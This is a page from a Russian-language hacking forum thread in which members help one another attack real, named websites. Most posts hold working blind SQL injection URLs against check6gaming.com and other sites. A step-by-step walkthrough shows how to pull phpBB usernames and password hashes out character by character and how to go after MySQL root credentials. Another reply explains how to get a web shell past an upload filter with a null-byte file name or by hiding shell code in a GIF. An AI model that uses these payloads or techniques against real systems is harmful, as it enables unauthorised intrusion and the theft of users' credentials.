Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    R1dex
    Опередил, там два запроса, в одном 8 полей во втором 50, это вывод из 2-го
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    R1dex красавчег, а я в исхолники не посмотрел. +5
     
  3. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Еще вопросег =)
    http://www.check6gaming.com/news.php?id=67+GROUP+BY+100+--
    пробовл все, вплоть до 0 - сначала ишед Unknown column, а когда подставляю 1 или 0 - Can't group on 'count(*)'
    Что я делаю не так?
     
  4. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    вот что смог определить
    Code:
    http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
    5 версия мускула
     
  5. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Гм, интеренсо...
    А продробней не расскажешь, как определял - какие промежуточные действия были до hand+substring(@@version,1,1)=5
     
  6. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    wildshaman
    Использовал подзапросы, посимвольный перебор
    читай _www.abc-it.lv/index.php/id/715

    промежуточные действия

    substring(@@version,1,1)=3
    substring(@@version,1,1)=4
    substring(@@version,1,1)=5

    5 возвращает true. Значит версия пятая.
    Так же можешь перебрать user,database и т.д.
     
  7. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    вот имеется наш урл:
    Code:
    http://www.check6gaming.com/news.php?id=67
    для теста на inj проверяем
    Code:
    http://www.check6gaming.com/news.php?id=67+and+1=1
    выводится тот же запрос,что и при id=67
    определяем версию:
    substring(@@version,1,1)=4
    первый символ сравниваем с 4, если 4 версия то отобразиться такая же странцица как и при id=67

    наконец запрос
    Code:
    http://www.check6gaming.com/news.php?id=67+and+substring(@@version,1,1)=5
    не выдает ошибки, соответственно версия мускула = 5
     
    #4547 z00MAN, 11 Jan 2009
    Last edited: 11 Jan 2009
    1 person likes this.
  8. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    Хех, спасибо =)
    Как бы еще количество столбцов...
     
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Если слепую крутить, то и кол-во столбцов не нужно.

    Code:
    http://www.check6gaming.com/news.php?id=67+and+substring((select+table_name+from+information_schema.tables+limit+17,1),1,18)='fp_accomplishments'
     
  10. mak-shapova

    mak-shapova New Member

    Joined:
    11 Jan 2009
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    хай
    Есть скуль на сайте
    база MSSQL
    ввожу
    index.cfm?page=search&searchstring=111-222-1933email@address.tst&searchtype=@@version или (select+system_user)
    все нормально выводит
    но как только пытаюсь вывести имена таблиц, страница просто перезагружается, не каких ошибок и прочего :(

    В чем трабла? как вывести имена таблиц и колонок?
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 wildshaman:

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((SELECT+password+from+mysql.user+WHERE+user='root'),1,1)))

    А таблицы можешь так подбирать:

    http://www.check6gaming.com/admin.php?name=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+name+from+admin+LIMIT+0,1),(select+name+from+admin+LIMIT+1,1),(select+name+from+admin+LIMIT+2,1)),1,1)))=97
     
    #4551 Pashkela, 11 Jan 2009
    Last edited: 11 Jan 2009
    1 person likes this.
  12. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    530
    Likes Received:
    494
    Reputations:
    99
    спс, но во втором случае пишед ошибку 404 нот фаунд (пробелы убрал), а в первом - SELECT command denied to user 'check6ga_root'@'localhost' for table 'user' =(
     
  13. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    89
    Likes Received:
    41
    Reputations:
    0
    Взломал сайт, получил доступ в админку, пытаюсь залить шелл-проверяется расширение файла (только jpg or gif)
    file_priv отключён, доступа к mysql.user нет, только в админку.
    Думается, что shell.php.jpg заливать смысла нет ))... Как быть?
    Подскажите плз. Слышал, кто то говорил что как то проинклудить можно. В общем поделитесь соображениями и опытом.
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 wildshaman:

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+2,1)),1,1)))=97
     
    1 person likes this.
  15. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    565
    Likes Received:
    309
    Reputations:
    27
    Если проверяеться только расширения, но не сам факт что это картинка попробуй null байт, shell.php%00.jpg, если проверяеться сам факт что это картинка, то запихни в маленку картинку, например в .gif код шелла, и посмотри что бы валидно открывалась картинка и попробуй то же самое, а вообше че за админка? Паблик движок или самопис?
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает :)

    2 wildshaman
    Смотри запрос который дал R1dex на предыдущей странице
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    гы, я не спорю, похоже на бред, конечно, но есть разница таки между:

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1),(select+id+from+fp_accomplishments+LIMIT+1,1),(select+id+from+fp_accomplishments+LIMIT+2,1)),1,1)))=49

    и

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+2,1)),1,1)))=49

    насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые. Ну ,конечно, данный способ не для 5-ой ветки:)) Но blind-sql-inj есть не только в пятой ветке
     
    #4557 Pashkela, 11 Jan 2009
    Last edited: 11 Jan 2009
  18. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    565
    Likes Received:
    309
    Reputations:
    27
    да, в принципе ты прав, но, в concat_ws если у тебя первый запрос вернет error то остальные выполняться не будут, то есть, что я хочу сказать, там есть check6ga_forums.phpbb_users и

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS(0x3a,(select+id+from+admin+LIMIT+0,1),(select+user_password+from+phpbb_users+LIMIT+1,1),(select+user_password+from+phpbb_users+LIMIT+1,1)),1,1)))=97

    нам будет возврашено
    Table 'check6ga_forums.admin' doesn't exist,
    потому как первый запрос в concat_ws вернул error остальные запросы в concat_ws не выполнились, поэтому использования 3 запросов в concat_ws без смыслено.
     
    #4558 AkyHa_MaTaTa, 11 Jan 2009
    Last edited: 11 Jan 2009
    2 people like this.
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    не могу не согласиться, туплю чото сегодня по черному. +

    проверка:

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+id+from+admin),1,1)))=49

    найденная таблица (и уже случайно колонка):

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+id+from+phpbb_users),1,1)))=49

    брут колонок из phpbb_users :

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+user+from+phpbb_users),1,1)))=49

    сбрутилась еще одна:

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+username+from+phpbb_users),1,1)))=49

    ну в общем стандартные колонки из форума phpbb, значит есть поле и user_password:

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+user_password+from+phpbb_users),1,1)))=49

    Далее понятно

    но все таки напишу:

    ищем ник 1 пользователя в базе:

    проверяем на 1-ую буковку 'a':

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+username+from+phpbb_users+limit+0,1),1,1)))=97

    угадали, отлично, проверяем вторую букву далее по алфавиту:

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+username+from+phpbb_users+limit+0,1),2,1)))=98

    не подходит, и так дошлепали до 110, буква 'n':

    http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+username+from+phpbb_users+limit+0,1),2,1)))=110

    на всякий случай проверяем нашу догадку:

    http://www.check6gaming.com/news.php?id=67+AND+substring((select+username+from+phpbb_users+limit+0,1),1,2)='an'

    значит всё верно. И так бомбим до победного конца. Тоже самое с user_password
     
    #4559 Pashkela, 11 Jan 2009
    Last edited: 11 Jan 2009
    1 person likes this.
  20. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    2 wildshaman:
    ещё слепые inj:
    Code:
    http://www.trunov.com/content.php?act=showcat&id=11+and+substring(@@version,1,1)=4
    Code:
    http://www.sisterstates.com/statetaxforms.php?id=11+and+substring(@@version,1,1)=4
    версия мускула = 4
     
    #4560 z00MAN, 11 Jan 2009
    Last edited: 11 Jan 2009
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.